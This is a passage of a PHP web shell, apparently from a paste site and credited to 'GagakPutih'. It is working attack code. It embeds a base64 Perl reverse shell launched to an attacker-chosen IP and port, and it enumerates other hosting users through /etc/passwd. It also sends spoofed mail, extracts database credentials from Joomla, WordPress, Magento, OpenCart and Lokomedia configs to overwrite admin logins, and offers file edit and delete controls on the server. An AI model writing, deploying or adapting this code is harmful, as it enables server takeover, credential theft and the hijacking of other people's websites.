  3697.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3698.     if(isset($_POST['sub_bc'])) {
  3699.         $f_bc = fopen("/tmp/bc.pl", "w");
  3700.         fwrite($f_bc, base64_decode($bind_connect_p));
  3701.         fclose($f_bc);
  3702.  
  3703.         $ipbc = $_POST['ip_bc'];
  3704.         $port = $_POST['port_bc'];
  3705.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3706.         sleep(1);
  3707.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3708.         unlink("/tmp/bc.pl");
  3709.     }
  3710. }elseif($_GET['GagakPutih'] == 'jumping') {
  3711.     $i = 0;
  3712.     echo "<div class='margin: 5px auto;'>";
  3713.     if(preg_match("/hsphere/", $dir)) {
  3714.         $urls = explode("\r\n", $_POST['url']);
  3715.         if(isset($_POST['jump'])) {
  3716.             echo "<pre>";
  3717.             foreach($urls as $url) {
  3718.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3719.                 $etc = "/etc/passwd";
  3720.                 $f = fopen($etc,"r");
  3721.                 while($gets = fgets($f)) {
  3722.                     $pecah = explode(":", $gets);
  3723.                     $user = $pecah[0];
  3724.                     $dir_user = "/hsphere/local/home/$user";
  3725.                     if(is_dir($dir_user) === true) {
  3726.                         $url_user = $dir_user."/".$url;
  3727.                         if(is_readable($url_user)) {
  3728.                             $i++;
  3729.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3730.                             if(is_writable($url_user)) {
  3731.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3732.                             }
  3733.                             echo $jrw."<br>";
  3734.                         }
  3735.                     }
  3736.                 }
  3737.             }
  3738.         if($i == 0) {
  3739.         } else {
  3740.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3741.         }
  3742.         echo "</pre>";
  3743.         } else {
  3744.             echo '<center>
  3745.                   <form method="post">
  3746.                   List Domains: <br>
  3747.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3748.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3749.             while($getss = fgets($fp)) {
  3750.                 echo $getss;
  3751.             }
  3752.             echo  '</textarea><br>
  3753.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3754.                   </form></center>';
  3755.         }
  3756.     } elseif(preg_match("/vhosts/", $dir)) {
  3757.         $urls = explode("\r\n", $_POST['url']);
  3758.         if(isset($_POST['jump'])) {
  3759.             echo "<pre>";
  3760.             foreach($urls as $url) {
  3761.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  3762.                 if(is_dir($web_vh) === true) {
  3763.                     if(is_readable($web_vh)) {
  3764.                         $i++;
  3765.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3766.                         if(is_writable($web_vh)) {
  3767.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3768.                         }
  3769.                         echo $jrw."<br>";
  3770.                     }
  3771.                 }
  3772.             }
  3773.         if($i == 0) {
  3774.         } else {
  3775.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3776.         }
  3777.         echo "</pre>";
  3778.         } else {
  3779.             echo '<center>
  3780.                   <form method="post">
  3781.                   List Domains: <br>
  3782.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3783.                   bing("ip:$ip");
  3784.             echo  '</textarea><br>
  3785.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3786.                   </form></center>';
  3787.         }
  3788.     } else {
  3789.         echo "<pre>";
  3790.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3791.         while($passwd = fgets($etc)) {
  3792.             if($passwd == '' || !$etc) {
  3793.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3794.             } else {
  3795.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3796.                 foreach($user_jumping[1] as $myuser_jump) {
  3797.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  3798.                     if(is_readable($user_jumping_dir)) {
  3799.                         $i++;
  3800.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3801.                         if(is_writable($user_jumping_dir)) {
  3802.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3803.                         }
  3804.                         echo $jrw;
  3805.                         if(function_exists('posix_getpwuid')) {
  3806.                             $domain_jump = file_get_contents("/etc/named.conf");   
  3807.                             if($domain_jump == '') {
  3808.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3809.                             } else {
  3810.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3811.                                 foreach($domains_jump[1] as $dj) {
  3812.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3813.                                     $user_jumping_url = $user_jumping_url['name'];
  3814.                                     if($user_jumping_url == $myuser_jump) {
  3815.                                         echo " => ( <u>$dj</u> )<br>";
  3816.                                         break;
  3817.                                     }
  3818.                                 }
  3819.                             }
  3820.                         } else {
  3821.                             echo "<br>";
  3822.                         }
  3823.                     }
  3824.                 }
  3825.             }
  3826.         }
  3827.         if($i == 0) {
  3828.         } else {
  3829.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3830.         }
  3831.         echo "</pre>";
  3832.     }
  3833.     echo "</div>";
  3834. }elseif($_GET['GagakPutih'] == 'mail') {
  3835. if($_POST['send']) {
  3836.   $to = $_POST['to'];
  3837.   $from = $_POST['from'];
  3838.   $subject = $_POST['subject'];
  3839.   $content = sulap($_POST['content']);
  3840.   if(@mail($to,$subject,$content,"FROM:$from")) {
  3841.     $out = "Mail sent to $to";
  3842.   } else {
  3843.     $out = "Failed !!";
  3844.   }
  3845. }
  3846.   echo "<h1>Mailer</h1>
  3847. <form method='post'>
  3848. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  3849. Subject :
  3850. <input type='text' name='subject' value='Your Website'><br>
  3851. To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='GagakPutih@ini.email'><br><input type='submit' name='send' value='Send'><br><br>";
  3852. echo $out;
  3853. }elseif($_GET['GagakPutih'] == 'edituser') {
  3854.     if($_POST['hajar']) {
  3855.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  3856.             echo "username atau password harus lebih dari 6 karakter";
  3857.         } else {
  3858.             $user_baru = $_POST['user_baru'];
  3859.             $pass_baru = md5($_POST['pass_baru']);
  3860.             $conf = $_POST['config_dir'];
  3861.             $scan_conf = scandir($conf);
  3862.             foreach($scan_conf as $file_conf) {
  3863.                 if(!is_file("$conf/$file_conf")) continue;
  3864.                 $config = file_get_contents("$conf/$file_conf");
  3865.                 if(preg_match("/JConfig|joomla/",$config)) {
  3866.                     $dbhost = ambilkata($config,"host = '","'");
  3867.                     $dbuser = ambilkata($config,"user = '","'");
  3868.                     $dbpass = ambilkata($config,"password = '","'");
  3869.                     $dbname = ambilkata($config,"db = '","'");
  3870.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  3871.                     $prefix = $dbprefix."users";
  3872.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3873.                     $db = mysql_select_db($dbname);
  3874.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3875.                     $result = mysql_fetch_array($q);
  3876.                     $id = $result['id'];
  3877.                     $site = ambilkata($config,"sitename = '","'");
  3878.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  3879.                     echo "Config => ".$file_conf."<br>";
  3880.                     echo "CMS => Joomla<br>";
  3881.                     if($site == '') {
  3882.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3883.                     } else {
  3884.                         echo "Sitename => $site<br>";
  3885.                     }
  3886.                     if(!$update OR !$conn OR !$db) {
  3887.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3888.                     } else {
  3889.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3890.                     }
  3891.                     mysql_close($conn);
  3892.                 } elseif(preg_match("/WordPress/",$config)) {
  3893.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  3894.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  3895.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3896.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  3897.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3898.                     $prefix = $dbprefix."users";
  3899.                     $option = $dbprefix."options";
  3900.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3901.                     $db = mysql_select_db($dbname);
  3902.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3903.                     $result = mysql_fetch_array($q);
  3904.                     $id = $result[ID];
  3905.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3906.                     $result2 = mysql_fetch_array($q2);
  3907.                     $target = $result2[option_value];
  3908.                     if($target == '') {
  3909.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3910.                     } else {
  3911.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3912.                     }
  3913.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3914.                     echo "Config => ".$file_conf."<br>";
  3915.                     echo "CMS => Wordpress<br>";
  3916.                     echo $url_target;
  3917.                     if(!$update OR !$conn OR !$db) {
  3918.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3919.                     } else {
  3920.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3921.                     }
  3922.                     mysql_close($conn);
  3923.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3924.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3925.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3926.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3927.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3928.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3929.                     $prefix = $dbprefix."admin_user";
  3930.                     $option = $dbprefix."core_config_data";
  3931.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3932.                     $db = mysql_select_db($dbname);
  3933.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3934.                     $result = mysql_fetch_array($q);
  3935.                     $id = $result[user_id];
  3936.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3937.                     $result2 = mysql_fetch_array($q2);
  3938.                     $target = $result2[value];
  3939.                     if($target == '') {
  3940.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3941.                     } else {
  3942.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3943.                     }
  3944.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3945.                     echo "Config => ".$file_conf."<br>";
  3946.                     echo "CMS => Magento<br>";
  3947.                     echo $url_target;
  3948.                     if(!$update OR !$conn OR !$db) {
  3949.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3950.                     } else {
  3951.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3952.                     }
  3953.                     mysql_close($conn);
  3954.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3955.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3956.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3957.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3958.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3959.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3960.                     $prefix = $dbprefix."user";
  3961.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3962.                     $db = mysql_select_db($dbname);
  3963.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3964.                     $result = mysql_fetch_array($q);
  3965.                     $id = $result[user_id];
  3966.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3967.                     if($target == '') {
  3968.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3969.                     } else {
  3970.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3971.                     }
  3972.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3973.                     echo "Config => ".$file_conf."<br>";
  3974.                     echo "CMS => OpenCart<br>";
  3975.                     echo $url_target;
  3976.                     if(!$update OR !$conn OR !$db) {
  3977.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3978.                     } else {
  3979.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3980.                     }
  3981.                     mysql_close($conn);
  3982.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3983.                     $dbhost = ambilkata($config,'server = "','"');
  3984.                     $dbuser = ambilkata($config,'username = "','"');
  3985.                     $dbpass = ambilkata($config,'password = "','"');
  3986.                     $dbname = ambilkata($config,'database = "','"');
  3987.                     $prefix = "users";
  3988.                     $option = "identitas";
  3989.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3990.                     $db = mysql_select_db($dbname);
  3991.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3992.                     $result = mysql_fetch_array($q);
  3993.                     $target = $result[alamat_website];
  3994.                     if($target == '') {
  3995.                         $target2 = $result[url];
  3996.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3997.                         if($target2 == '') {
  3998.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3999.                         } else {
  4000.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  4001.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  4002.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  4003.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  4004.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  4005.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  4006.                             } else {
  4007.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4008.                             }
  4009.                         }
  4010.                     } else {
  4011.                         $cek_login = file_get_contents("$target/adminweb/");
  4012.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  4013.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  4014.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  4015.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  4016.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  4017.                         } else {
  4018.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4019.                         }
  4020.                     }
  4021.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  4022.                     echo "Config => ".$file_conf."<br>";
  4023.                     echo "CMS => Lokomedia<br>";
  4024.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  4025.                         echo $url_target2;
  4026.                     } else {
  4027.                         echo $url_target;
  4028.                     }
  4029.                     if(!$update OR !$conn OR !$db) {
  4030.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4031.                     } else {
  4032.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4033.                     }
  4034.                     mysql_close($conn);
  4035.                 }
  4036.             }
  4037.         }
  4038.     } else {
  4039.         echo "<center>
  4040.         <h1>Auto Edit User Config</h1>
  4041.         <form method='post'>
  4042.         DIR Config: <br>
  4043.         <input type='text' size='50' name='config_dir' value='$path'><br><br>
  4044.         Set User & Pass: <br>
  4045.         <input type='text' name='user_baru' value='GagakPutih' placeholder='user_baru'><br>
  4046.         <input type='text' name='pass_baru' value='GagakPutih' placeholder='pass_baru'><br>
  4047.         <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  4048.         </form>";
  4049.     }
  4050. }elseif(isset($_GET['filesrc'])){
  4051. echo "<tr><td>Current File : ";
  4052. echo $_GET['filesrc'];
  4053. echo '</tr></td></table><br/>';
  4054. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  4055. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  4056. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  4057. if($_POST['opt'] == 'chmod'){
  4058. if(isset($_POST['perm'])){
  4059. if(chmod($_POST['path'],$_POST['perm'])){
  4060. echo '<font color="green">Success !</font><br/>';
  4061. }else{
  4062. echo '<font color="red">Denied !</font><br />';
  4063. }
  4064. }
  4065. echo '<form method="POST">
  4066. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  4067. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4068. <input type="hidden" name="opt" value="chmod">
  4069. <input type="submit" value="Go" />
  4070. </form>';
  4071. }
  4072. elseif($_POST['opt'] == 'rename'){
  4073. if(isset($_POST['newname'])){
  4074. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  4075. echo '<font color="green">Success !</font><br/>';
  4076. }else{
  4077. echo '<font color="red">Denied !</font><br />';
  4078. }
  4079. $_POST['name'] = $_POST['newname'];
  4080. }
  4081. echo '<form method="POST">
  4082. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  4083. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4084. <input type="hidden" name="opt" value="rename">
  4085. <input type="submit" value="Go" />
  4086. </form>';
  4087. }elseif($_POST['opt'] == 'edit'){
  4088. if(isset($_POST['src'])){
  4089. $fp = fopen($_POST['path'],'w');
  4090. if(fwrite($fp,$_POST['src'])){
  4091. echo '<font color="green">Success !</font><br/>';
  4092. }else{
  4093. echo '<font color="red">Denied !</font><br/>';
  4094. }
  4095. fclose($fp);
  4096. }
  4097. echo '<form method="POST">
  4098. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  4099. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4100. <input type="hidden" name="opt" value="edit">
  4101. <input type="submit" value="Save" />
  4102. </form>';
  4103. }
  4104. echo '</center>';
  4105. }else{
  4106. echo '</table><br/><center>';
  4107. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  4108. if($_POST['type'] == 'dir'){
  4109. if(rmdir($_POST['path'])){
  4110. echo '<font color="green">Success !</font><br/>';
  4111. }else{
  4112. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  4113. }
  4114. }elseif($_POST['type'] == 'file'){
  4115. if(unlink($_POST['path'])){
  4116. echo '<font color="green">Success</font><br/>';
  4117. }else{
  4118. echo '<font color="red">Denied</font><br/>';
  4119. }
  4120. }
  4121. }
  4122. echo '</center>';
  4123. $scandir = scandir($path);
  4124. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  4125. <tr class="first">
  4126. <td><center>Name</center></td>
  4127. <td><center>Size</center></td>
  4128. <td><center>Permission</center></td>
  4129. <td><center>Action</center></td>
  4130. </tr>';
  4131.  
  4132. foreach($scandir as $dir){
  4133. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  4134. echo '<tr>
  4135. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  4136. <td><center>--</center></td>
  4137. <td><center>';
  4138. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  4139. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  4140. echo perms($path.'/'.$dir);
  4141. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  4142.  
  4143. echo '</center></td>
  4144. <td><center><form method="POST" action="?option&path='.$path.'">
  4145. <select name="opt">
  4146. <option value="">Select</option>
  4147. <option value="delete">Delete</option>
  4148. <option value="chmod">Chmod</option>
  4149. <option value="rename">Rename</option>
  4150. </select>
  4151. <input type="hidden" name="type" value="dir">
  4152. <input type="hidden" name="name" value="'.$dir.'">
  4153. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  4154. <input type="submit" value=">">
  4155. </form></center></td>
  4156. </tr>';
  4157. }
  4158. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  4159. foreach($scandir as $file){
  4160. if(!is_file($path.'/'.$file)) continue;
  4161. $size = filesize($path.'/'.$file)/1024;
  4162. $size = round($size,3);
  4163. if($size >= 1024){
  4164. $size = round($size/1024,2).' MB';
  4165. }else{
  4166. $size = $size.' KB';
  4167. }
  4168.  
  4169. echo '<tr>
  4170. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  4171. <td><center>'.$size.'</center></td>
  4172. <td><center>';
  4173. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  4174. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  4175. echo perms($path.'/'.$file);
  4176. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  4177. echo '</center></td>
  4178. <td><center><form method="POST" action="?option&path='.$path.'">
  4179. <select name="opt">
  4180. <option value="">Select</option>
  4181. <option value="delete">Delete</option>
  4182. <option value="chmod">Chmod</option>
  4183. <option value="rename">Rename</option>
  4184. <option value="edit">Edit</option>
  4185. </select>
  4186. <input type="hidden" name="type" value="file">
  4187. <input type="hidden" name="name" value="'.$file.'">
  4188. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  4189. <input type="submit" value=">">
  4190. </form></center></td>
  4191. </tr>';
  4192. }
  4193. echo '</table>
  4194. </div></div>';
  4195. }
  4196. echo '<center><br/>Copyright &copy '.date("Y").' <a href="https://www.facebook.com/rinto2234" target="_blank">Con7ext</a> - <a href="https://www.facebook.com/xaisyndicate" target="_blank">'.$_COPY.'</a><br>Recoded & Modified by ./GagakPutih</center>
  4197. </body>
  4198. </html>';
  4199. ?>
Add Comment
Please, Sign In to add comment